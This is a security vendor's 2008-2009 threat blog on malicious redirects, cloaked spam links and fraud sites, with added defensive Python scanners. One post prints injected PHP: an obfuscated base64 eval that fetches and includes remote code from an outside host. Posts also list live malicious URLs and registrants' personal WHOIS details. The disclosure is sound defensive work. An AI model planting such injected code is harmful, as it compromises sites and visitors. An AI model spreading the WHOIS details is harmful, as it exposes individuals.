Monday, September 21, 2009

Google Users Targeted By New Malicious Websites

eSoft’s Threat Prevention Team has been tracking compromised sites that host PageRank Bombs since 2008.  The attacker hacks a site, but instead of putting exploits on the hacked site, they put links to other websites in order to boost the search result ranking on various search engines.  Initially this was being used for ad sites, porn sites, and pharmafraud sites.  Now, however, it is being used to boost the results of malicious sites, but with a new twist that targets Google users.

The sites whose search engine ranking is being boosted are now serving up malware through a complex series of redirects.  However, the redirects and the malware are only served up if the user gets to the site after clicking the link on Google.  Going directly to the malicious site (by pasting into your browser directly) results in a harmless page.

For example, using Google, a search for “nhl all-time scoring leaders” returns several malicious results on the first page (in the 5th, 6th, 7th, 8th and 10th positions). 



Going to the website, hxxp://adoptabeach.org/zzbtw/colzw/leaders.php, directly results in an innocuous page like this:



[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

However, clicking the link in the Google search results will bring the user to a web site using a common Rogue Anti-Virus template that alerts the user that their PC is infected and prompts unsuspecting users to download what is really a Trojan:



The Trojan downloaded at this point has only a 7% detection rate among anti-virus products, with Microsoft, NOD32 and Panda detecting it.

Some of the sites being used include:
hxxp://shanthkherath.com
hxxp://adoptabeach.org
hxxp://advertising-made-easy.com

These redirect through some URLs including:
hxxp://skystats1.net/in.cgi?9
hxxp://skystats1.net/redirect2/
http://jeremy-kyle-now.cn/go.php?id=2004&key=ff0057594&p=1

As far as eSoft’s TPT can tell, the referrer (the HTTP Referer header) must contain the string google.com/search?q= and the User-Agent must indicate a Windows machine, or the malware will not be delivered.  Users of other search engines or operating systems do not yet appear to be targeted.

Wednesday, September 9, 2009

Fake Blogs Serve Rogue Malware

eSoft’s Threat Prevention Team has uncovered a massive amount of recently exploited websites, all redirecting to Rogue AV malware.

At the time of writing, Google shows over 720,000 compromised URLs.  According to VirusTotal [http://www.virustotal.com/analisis/23c06523d4b5cf2c9e853bb5e7a20916e5246e81a17a39b9aad3f2f86056defd-1252440943], only two of forty-one anti-virus companies are currently detecting the malware. 

Credit also goes to Edgar (http://edetools.blogspot.com) who independently discovered and blogged about this same threat.

The compromised sites frequently contain fake blogs on the topics of entertainment and celebrities such as Britney Spears (see screenshot).

hxxp://aljassmy.com/music/html/bmblog/britney-spears-chocho-a-lo-locco/.


Upon visiting the site, an obfuscated JavaScript file redirects the visitor to one of several sites that host the malware payload.  Multiple redirect domains are being used to further obscure the final destination, and all of these are currently flagged as malicious by eSoft (most have been set to malicious for over a week).

Unprotected users will see a pop-up window that performs a fake system scan. The user is then notified that they are infected with several threats and prompted to download the supposed cure, which is in fact the malware.  This scheme is all too common, and eSoft’s Threat Prevention Team has been detecting a dramatic increase in this scam through August.  This latest campaign appears to be the most widespread to date.


The malware payloads change often and anti-virus detection is lagging behind.  eSoft recommends multiple layers of anti-virus at the desktop and gateway in combination with secure web filtering. A secure web filter protects users by blocking the malware distribution points even as the malware changes to evade anti-virus detection.

Friday, August 28, 2009

Chinese Scams Resurface with New Branding

The Threat Prevention Team has found thousands of URLs and over 200 new domains registered to a group of Chinese scammers. The new sites are the same as the old, but with new branding and promotional products, such as "Acai Power Slim", "Pure Magnum Pro" and "Colo Cleanse Plus". This scam is perpetrated by sending spam messages advertising a "free trial" of the products. In the end, the criminals have made off with personal information, a credit card number and a recurring monthly charge.

Here is an example of an “Acai Power Slim” site. The pages are filled with bogus testimonials, citations from CBS and ABC News and clinical research. Also note the pressure to sign up for the "risk free trial."

As you dig through the site, you'll notice that any meaningful way to contact the site owners has been removed. An email form is present, which presumably will never be answered. All of the domains found match the previous pattern and have been registered to Chinese ownership.

DomainName : appleaboard.com

Creation Date ..................2009-08-19
Last Update Date ...............2009-08-24

Registrant Name .................FANG JUN
Registrant Organization .........FANG JUN
Registrant Address ..............JIANGYANGBERILI13
Registrant City..................YY
Registrant Province/State .......HN
Registrant Country Code .........CN
Registrant Postal Code ..........414039
Registrant Phone Number .........+86.073051421473
Registrant Fax ..................+86.073051421473
Registrant Email ................hiuaxiang@163.com

Expect to see an increase in spam associated with these domains over the next several weeks as the scammers attempt to lure people to these sites. eSoft is detecting these sites as "Phishing & Fraud."

Here is a sample list of the recently registered domains:
  • appleaboard.com
  • easyalong.com
  • fasterdevelop.com
  • pureacaisolution.com
  • sunnyact.com
More information on this scam is available on the spamtrackers.eu wiki: http://spamtrackers.eu/wiki/index.php/Acai_Power_Slim

Wednesday, August 26, 2009

New Rash of Fraud Sites Touting Cheap Software

eSoft is researching a widespread and dangerous ring of fraudulent "OEM Software" distribution sites. These sites offer popular software from Microsoft, Adobe, and many other vendors at a greatly reduced price. Not only do they not deliver installable software, they collect sensitive information from individuals, including credit card numbers.

eSoft has identified over 11,000 of these web pages so far.

While these sites may look real, touting Microsoft and Verisign certifications, they are far from legitimate. Many of these sites come back as top results in Google and Yahoo searches. Alarmingly, many URL filters are NOT able to detect and block these sites.

Here is just one example of the many sites currently up and running. 

The company name given on many of these fraudulent sites is "OEM Downloads Inc", “Authorized Software Reseller” or “Download Software”. You can check for this at the bottom of the page where there is often a copyright notice. Throughout the sites there are tell-tale signs that this is a shady website that should not be trusted.

Straight from their FAQ..."you will not receive any printed documentation (licensing or instructions) - just files and instructions in .txt format, and will not be able to register this software online." This was the company's explanation for the low prices they are able to offer. If you are not able to register the product, it is not a real copy or you won’t be getting it in the first place.

Another sign is that they are offering Adobe Creative Suite software on the site. Adobe does not distribute or allow OEM distribution of their software. In fact, OEM software is rarely sold outside of a hardware bundle, like a new computer system.

Unsurprisingly, the whois information shows Russian ownership for most of these domains. For example:

------------------------------

WHOIS – COMPUTERCODEPLANET.COM

   Domain Name: COMPUTERCODEPLANET.COM
   Registrar: ONLINENIC, INC.
   Whois Server: whois.onlinenic.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.ENCATGPC.COM
   Name Server: NS2.ENCATGPC.COM
   Status: ok
   Updated Date: 20-jul-2009
   Creation Date: 06-jan-2009
   Expiration Date: 06-jan-2010

Registrant:
         Valery Rigalo vrigalo77@inbox.ru +7.4999384712
         N/A
         Novomariinskaya str., 11/1, apt. 38
         Moscow,N/A,RU 193901


Domain Name:computercodeplanet.com
Record last updated at 2009-01-06 12:08:08
Record created on 2009/1/6
Record expired on 2010/1/6


Domain servers in listed order:
         ns1.encatgpc.com        ns2.encatgpc.com

------------------------------

The Threat Prevention Team has also noticed that many compromised sites, including some government and educational sites, are linking back to these domains. This further substantiates the criminal intentions of these fraudsters. eSoft is flagging these URLs as “Phishing & Fraud.”

Friday, August 21, 2009

Mass Compromise of Sites with Webalizer

The eSoft Threat Prevention Team has been tracking a rapidly growing pattern in website exploits over the last 24 hours. Since Thursday, Aug 20, eSoft has seen over 6,000 compromised URLs of the pattern:

http://www.example.com/webalizer/050709wareza/crack=28=keygen=serial.html

And the numbers are growing at a rate of several hundred per hour. A Google search for inurl:050609wareza shows around 30,000 such compromised sites.
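
The URL pattern above is distinctive enough to hunt for in proxy or web-server logs. The following is an added example, not eSoft's tooling: it generalises the quoted path (a six-digit date prefix followed by "wareza" as one path segment, then a warez-keyword filename, with the digits left variable because the post quotes both 050709 and 050609) and runs it over a constructed proxy-log sample. The log layout (timestamp, client, method, URL, status) and all hosts and addresses are assumptions chosen for the example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Generalisation of the URL pattern quoted in the post:
#   /webalizer/050709wareza/crack=28=keygen=serial.html
# A six-digit date followed by "wareza" as one path segment, then a filename
# built from warez-style keywords. The digits are left variable because the
# post itself quotes both 050709 and 050609.
WAREZA_PATH = re.compile(
    r"/\d{6}wareza/[^/]*(?:crack|keygen|serial|warez)[^/]*\.html?$",
    re.IGNORECASE,
)

# Constructed sample in a simple proxy-log layout (timestamp, client,
# method, URL, status); not real traffic. Hostnames are RFC 2606 examples.
CONSTRUCTED_LOG = """\
1250870400.101 192.0.2.10 GET http://www.example.com/webalizer/050709wareza/crack=28=keygen=serial.html 200
1250870401.202 192.0.2.11 GET http://www.example.com/webalizer/usage_200908.html 200
1250870402.303 192.0.2.12 GET http://shop.example.org/img/050609wareza/photoshop=keygen.html 302
1250870403.404 192.0.2.13 GET http://www.example.net/news/index.html 200
garbage line that does not parse
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into fields; return None for lines that don't fit."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, client, method, url, status = parts
    return {"ts": ts, "client": client, "method": method, "url": url, "status": status}


def flag_wareza(log_text: str) -> List[Dict[str, object]]:
    """Return every request whose URL path matches the wareza pattern.

    Each hit records whether the path also sits under a /webalizer/ directory,
    the trait the post found on roughly a third of the compromised sites.
    """
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["url"]).path
        if WAREZA_PATH.search(path):
            hit: Dict[str, object] = dict(rec)
            hit["in_webalizer"] = "/webalizer/" in path.lower()
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in flag_wareza(CONSTRUCTED_LOG):
        print(hit["client"], hit["url"], "webalizer" if hit["in_webalizer"] else "")
```

Feed it a real log by reading the file into `flag_wareza`; the `in_webalizer` flag lets you separate hits that support the webalizer hypothesis from those that sit elsewhere in the site tree.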

The compromised pages typically contain nonsense text and a series of pictures of pills, along with links to more compromised sites and malicious scripts that trigger well-known exploits, including the recent exploit of the ActiveX streaming video control (CVE-2008-0015) discussed in this eSoft security bulletin:

http://www.esoft.com/alerts/cve-2008-0015.cfm.


In some cases, such as when eSoft researchers tried navigating to a compromised site using Firefox on Windows, a redirection to files express occurs:


In testing, when the exploit is successful, the payload appears to be an information-stealing Trojan, though it has varied. Since the payloads have weak coverage by AV companies and change frequently, blocking the offending websites is the best way to prevent infection.

eSoft’s Threat Prevention Team notes that around 1/3 of the compromised sites include a webalizer directory, which may indicate a correlation with a recently published webalizer exploit. That exploit allows an attacker to execute arbitrary code, often with elevated privileges. More information is available at the link below. Administrators are advised to configure webalizer not to perform reverse DNS lookups until a patch is released.

http://linuxdevcenter.com/pub/a/linux/2002/04/16/insecurities.html


eSoft will continue to cover this threat and to protect customers from these websites by flagging them as Compromised. At the start of research, Google had very few of these sites flagged as malicious, but increasing numbers are now being identified by their cloud security as well. Other security engines tested, including Web of Trust, Norman and McAfee SiteAdvisor, have very poor detection of these sites at this time.

Thursday, July 2, 2009

Have you heard the one about the independent testing lab?

They always independently verify that their client is the best.

Independent tests these days are a joke.

In the last week, two different reports from December 2008 came to my attention: one from Cascadia Labs commissioned by Trend Micro and the other from Tolly Group commissioned by Websense. They both have sections on the effectiveness of the major web filtering companies in blocking malicious websites.

Of these two reports, the Cascadia Labs report was slightly fairer, ranking Trend Micro as able to block 53% of web threats (the highest; presumably with anti-virus enabled as well as URL filtering), followed by McAfee (42%), Blue Coat (31%), Websense (23%) and IronPort (20%). I'm ignoring the SurfControl entry (9%) because, since Websense bought SurfControl, the product is essentially defunct and SurfControl partners are being urged to move to Websense.

The Tolly Group report said, "In tests with 379 URLs containing binary exploits or compromise code, Websense blocked 99% of URLs, versus other vendors who blocked between 53% to 91%." Let's look just at the results for Websense versus Trend Micro in terms of exploit detection in the two tests:





Report      Trend Micro   Websense
Tolly       53%           99%
Cascadia    53%           23%


Well, Trend Micro is consistent, but depending on who you ask, Websense is either twice as good or half as good. But here's the kicker, the Tolly report says, "All the URLs tested were mined from Websense ThreatSeeker network." So what they're saying is that Websense is very good (but not perfect) at detecting exploits on URLs it knows to have exploits.

Now here's the bottom line. A lot of folks make claims about security, but it's a hard thing to verify. eSoft, the sponsor of this blog, for example, detected 35k new malicious URLs last week and has over 1.5m recently verified malicious URLs in its database at the moment. The combined lists of Google, Trend Micro, Sunbelt, PayPal, Mozilla, AOL, and Consumer Reports, on the other hand, have only 318k [source: stopbadware.org]. But these might be 318k not covered in the eSoft list, so the question becomes: how do you test these types of products?

I have some thoughts on how truly independent testing could be done including the collection and verification of malicious URLs without relying on a particular list that some vendor may already include directly, but I want to put it out there. What testing methodology should be used in a fair comparison of the ability of different products to block access to compromised, phishing, and otherwise malicious websites? And should the tests include things like malware call-home addresses? If so where does the source of URLs come from? And what is a fair sample size? What is a fair timeframe from first detection? Any feedback would be appreciated.

Friday, May 22, 2009

Return of the ThreatCenter blog

We've been dormant for a while, but it's time to bring back the ThreatCenter blog. eSoft's work in the web security area (identification of malicious and compromised websites, not securing of web servers) has produced amazing results and huge volumes of data, and it's time to share some of these results back with the greater community.

We recently shared some data on a few days' worth of fraudulent pharmacy sites with Richard Stiennon, who published the information on his ThreatChaos blog (if you haven't read the article, please check it out -- and digg it while you're there). eSoft is seeing these sites at an increasing rate that is fairly staggering.

In our next post, we'll show some of the uglier examples of what we call "pagerank bombs" -- compromised sites used to host hidden links rather than malware.

Tuesday, November 11, 2008

Compromised Sites Boost PageRank for Porn

A recent analysis of a compromised web site by eSoft's Threat Prevention Team led to the discovery of hidden links designed only to show up when viewed by web crawlers such as those used by Google, Microsoft and Yahoo.

The website reviewed, dancescape.tv, appears perfectly normal when viewed from standard browsers, but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler.

The PHP code in question looks like this:


eval(base64_decode("aWYgKChlcmVnaSgiYm90IiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgidXJwIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgibXNuIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkpIHsgc3lzdGVtKCJ3Z2V0IC1PIC90bXAvZ2V0aW5jbC50eHQgaHR0cDovL3B1YmxpY3NudWRlLmNvbS90ZW1wL2luY2wudHh0Iik7aW5jbHVkZSgiL3RtcC9nZXRpbmNsLnR4dCIpOyB9"));


And resolves to this:


if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) {
system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt");
include("/tmp/getincl.txt");
}
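
Injected code of this shape (an `eval` wrapped around `base64_decode`) is easy to find mechanically once you know to look for it. The following is an added example, not eSoft's code or the code found on the compromised site: a scanner that locates each `eval(base64_decode("..."))` call in PHP source, decodes the blob, and tags indicators such as process execution, remote fetch, file inclusion and crawler fingerprinting. The sample PHP it runs against is constructed to mirror the snippet above, with a placeholder domain (attacker.example.invalid) in place of the real one.

```python
import base64
import pathlib
import re
from typing import Dict, Iterable, List

# Matches eval(base64_decode("<blob>")) with either quote style and optional
# whitespace; the blob is captured for decoding.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)\s*\)""",
    re.IGNORECASE,
)

# Tokens in a decoded payload that turn "obfuscated code" into "alert":
# process execution, remote fetch, file inclusion, crawler fingerprinting.
INDICATORS = (
    "system(", "exec(", "shell_exec(", "passthru(", "popen(",
    "include(", "require(", "wget ", "curl ", "HTTP_USER_AGENT",
)


def decode_payloads(php_source: str) -> List[Dict[str, object]]:
    """Find each eval(base64_decode(...)) call, decode it and tag indicators."""
    findings: List[Dict[str, object]] = []
    for m in EVAL_B64.finditer(php_source):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            continue
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "indicators": [tok for tok in INDICATORS if tok in decoded],
        })
    return findings


def scan_files(paths: Iterable[pathlib.Path]) -> Dict[str, List[Dict[str, object]]]:
    """Run decode_payloads over PHP files, returning only files with findings."""
    report: Dict[str, List[Dict[str, object]]] = {}
    for path in paths:
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        found = decode_payloads(text)
        if found:
            report[str(path)] = found
    return report


# Constructed sample: the same shape as the injected snippet in the post, but
# with a placeholder domain (attacker.example.invalid) instead of the real one.
_PAYLOAD = (
    'if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or '
    'eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) { '
    'system("wget -O /tmp/getincl.txt http://attacker.example.invalid/temp/incl.txt"); '
    'include("/tmp/getincl.txt"); }'
)
SAMPLE_PHP = "\n".join([
    "<?php",
    "$title = 'Dance Schedule';",
    'eval(base64_decode("{}"));'.format(base64.b64encode(_PAYLOAD.encode()).decode()),
    "echo $title;",
    "?>",
])


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        report = scan_files(pathlib.Path(sys.argv[1]).rglob("*.php"))
    else:
        report = {"<constructed sample>": decode_payloads(SAMPLE_PHP)}
    for name, found in report.items():
        for f in found:
            print(name, "offset", f["offset"], "indicators", f["indicators"])
            print("  ", f["decoded"])
```

Run it with a document root as the argument to sweep a site; without arguments it decodes the constructed sample. Base64 that fails strict validation is skipped rather than guessed at, so a false alarm needs both a matching `eval(base64_decode(...))` call and a decodable blob.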


When viewing the page with a user agent of googlebot, you get a lot of links that weren't there before. Here's a screenshot of one of the less offensive examples:

In other instances, a ton of porn links and text are displayed instead of the pharmaceutical links shown here.

This illustrates the trend from open compromise to covert compromise. Most malware already tries to hide itself; web site defacements also seem to be a thing of the past, as compromised sites are used more and more for relaying attacks and for stealthier, income-earning purposes.
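
Both this post (content that only appears to crawler user agents) and the September 2009 post on Google-referred visitors (a redirect that fires only when the referrer contains google.com/search?q= and the User-Agent indicates Windows) describe cloaking: the same URL answering differently depending on who asks. The standard way to surface that is differential fetching. The following is an added example, not eSoft's tooling: it fetches one URL under several client profiles, fingerprints each response (status, final URL after redirects, body hash) and reports the profiles that diverge from a plain direct visit. The fetch function is injected so the detector can be exercised offline against a constructed stand-in that reproduces the behaviour the two posts describe; the user-agent strings, referrer query and all example.invalid hostnames are assumptions.

```python
import hashlib
import urllib.request
from typing import Callable, Dict, Tuple

# A fetcher takes (url, request headers) and returns (status, final URL after
# redirects, body). It is injected so the detector can be run offline.
Fetcher = Callable[[str, Dict[str, str]], Tuple[int, str, bytes]]

WINDOWS_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
LINUX_UA = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
GOOGLE_REFERER = "http://www.google.com/search?q=nhl+all-time+scoring+leaders"

# Client profiles to compare. "direct_windows" is the baseline a person pasting
# the URL would get; the others are the conditions the posts say change the page.
PROFILES: Dict[str, Dict[str, str]] = {
    "direct_windows": {"User-Agent": WINDOWS_UA},
    "google_referer_windows": {"User-Agent": WINDOWS_UA, "Referer": GOOGLE_REFERER},
    "google_referer_linux": {"User-Agent": LINUX_UA, "Referer": GOOGLE_REFERER},
    "googlebot": {"User-Agent": GOOGLEBOT_UA},
}


def fingerprint(status: int, final_url: str, body: bytes) -> Tuple[int, str, str]:
    """Reduce a response to something comparable across profiles."""
    return status, final_url, hashlib.sha256(body).hexdigest()[:16]


def probe(url: str, fetch: Fetcher, profiles=PROFILES, baseline="direct_windows"):
    """Fetch url once per profile; return all fingerprints and the divergent ones."""
    results = {name: fingerprint(*fetch(url, hdrs)) for name, hdrs in profiles.items()}
    base = results[baseline]
    divergent = {name: fp for name, fp in results.items() if fp != base}
    return results, divergent


def urllib_fetcher(url: str, headers: Dict[str, str], timeout: float = 10.0):
    """Real fetcher built on urllib (follows redirects) for probing a live URL."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.geturl(), resp.read()


def simulated_cloaked_site(url: str, headers: Dict[str, str]):
    """Constructed stand-in reproducing the behaviour the posts describe, so the
    detector can be exercised offline: Google referrer plus Windows UA ends up
    on a rogue-AV page, crawler user agents get hidden links, everyone else gets
    the innocuous page. Not a real server."""
    ua = headers.get("User-Agent", "")
    referer = headers.get("Referer", "")
    if "google.com/search?q=" in referer and "Windows" in ua:
        return 200, "http://rogue-av.example.invalid/scan.php", b"<html>Your PC is infected!</html>"
    if any(tok in ua.lower() for tok in ("bot", "slurp", "msn")):
        return 200, url, b"<html>leaders<div><a href='http://pills.example.invalid'>buy</a></div></html>"
    return 200, url, b"<html>leaders</html>"


if __name__ == "__main__":
    results, divergent = probe("http://victim.example.invalid/leaders.php", simulated_cloaked_site)
    for name, fp in results.items():
        print(("CLOAKED " if name in divergent else "        ") + name, fp)
```

Swap `simulated_cloaked_site` for `urllib_fetcher` to probe a live URL from an analysis host. Comparing the final URL as well as the body hash matters: in the September case the body a Google-referred Windows visitor sees is the rogue AV page on a different host, which a body-only comparison would still catch, but the redirect target is the more useful indicator to record.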

Friday, October 24, 2008

Malware scanning for different gateways

Recently eSoft's Threatlabs found an increase in malware using the UPnP/SSDP protocols to find new gateways out of a network. It appears that the effectiveness and increased use of IPS have impacted bot maintainers. Their answer: find another gateway. They are now sending UPnP discovery packets to locate other gateways on their local network. If you are an IT manager, be sure you know where all the exits on your network are.
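
One way to know when a host is hunting for exits is to watch SSDP itself: UPnP discovery is an M-SEARCH request multicast to 239.255.255.250:1900, and the ST header names what is being searched for. The following is an added example, not eSoft's code: a parser for SSDP datagrams plus a rule that flags hosts asking specifically for an Internet gateway device or WAN connection service (or ssdp:all, which would return them too). The search-target URNs are the standard UPnP identifiers; the packet feed is assumed to be a list of (source IP, datagram bytes) pairs from whatever capture tool you use, and the sample packets and addresses are constructed.

```python
from typing import Dict, FrozenSet, List, Optional, Tuple

# Standard UPnP search targets that ask for an Internet gateway. A workstation
# that emits these is looking for a way out of the network. ssdp:all returns
# every device, gateways included, so it is treated the same way.
GATEWAY_TARGETS = frozenset({
    "urn:schemas-upnp-org:device:InternetGatewayDevice:1",
    "urn:schemas-upnp-org:service:WANIPConnection:1",
    "urn:schemas-upnp-org:service:WANPPPConnection:1",
    "ssdp:all",
})


def parse_ssdp(datagram: bytes) -> Optional[Dict[str, str]]:
    """Parse an SSDP (HTTP-over-UDP) datagram into its start line and headers.

    Header names are lower-cased; returns None for anything that isn't SSDP.
    """
    try:
        text = datagram.decode("ascii")
    except UnicodeDecodeError:
        return None
    lines = text.split("\r\n")
    if not lines[0]:
        return None
    msg = {"start": lines[0]}
    for line in lines[1:]:
        if not line:          # blank line ends the header block
            break
        if ":" not in line:
            return None
        name, value = line.split(":", 1)
        msg[name.strip().lower()] = value.strip()
    return msg


def is_gateway_search(msg: Dict[str, str]) -> bool:
    """True for an M-SEARCH whose search target is a gateway (or everything)."""
    return msg["start"].startswith("M-SEARCH") and msg.get("st", "") in GATEWAY_TARGETS


def flag_gateway_hunters(
    packets: List[Tuple[str, bytes]], allowlist: FrozenSet[str] = frozenset()
) -> Dict[str, int]:
    """Count gateway searches per source, skipping hosts expected to send them
    (e.g. a management station that inventories UPnP devices)."""
    counts: Dict[str, int] = {}
    for src, dgram in packets:
        if src in allowlist:
            continue
        msg = parse_ssdp(dgram)
        if msg is not None and is_gateway_search(msg):
            counts[src] = counts.get(src, 0) + 1
    return counts


def _msearch(st: str) -> bytes:
    """Build a constructed M-SEARCH datagram for the sample data below."""
    return (
        "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
        'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ' + st + "\r\n\r\n"
    ).encode("ascii")


# Constructed sample capture: (source IP, datagram). Not real traffic.
CONSTRUCTED_PACKETS: List[Tuple[str, bytes]] = [
    ("192.0.2.20", _msearch("urn:schemas-upnp-org:device:InternetGatewayDevice:1")),
    ("192.0.2.20", _msearch("urn:schemas-upnp-org:service:WANIPConnection:1")),
    ("192.0.2.21", _msearch("urn:schemas-upnp-org:device:MediaRenderer:1")),
    ("192.0.2.22", b"NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
                   b"NT: upnp:rootdevice\r\nNTS: ssdp:alive\r\n\r\n"),
    ("192.0.2.23", b"\xff\xfe not ssdp at all"),
]


if __name__ == "__main__":
    for src, n in flag_gateway_hunters(CONSTRUCTED_PACKETS).items():
        print(src, "sent", n, "gateway discovery request(s)")
```

A NOTIFY announcement from a device and a search for a media renderer are left alone; only the host asking for a gateway is reported, which keeps the alert meaningful on a network full of legitimate UPnP chatter.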

Microsoft out-of-band release

It's been a long time since our last post, but this week's activity warrants one. Yesterday, Microsoft announced a critical update (MS08-067) outside of their normal "Patch Tuesday" cycle. Well, it turns out that it was a good idea. The patch closes a security hole in how Windows systems communicate with each other. This vulnerability has the potential to be exploited by a worm and spread widely. All users of Windows systems are advised to update as soon as possible.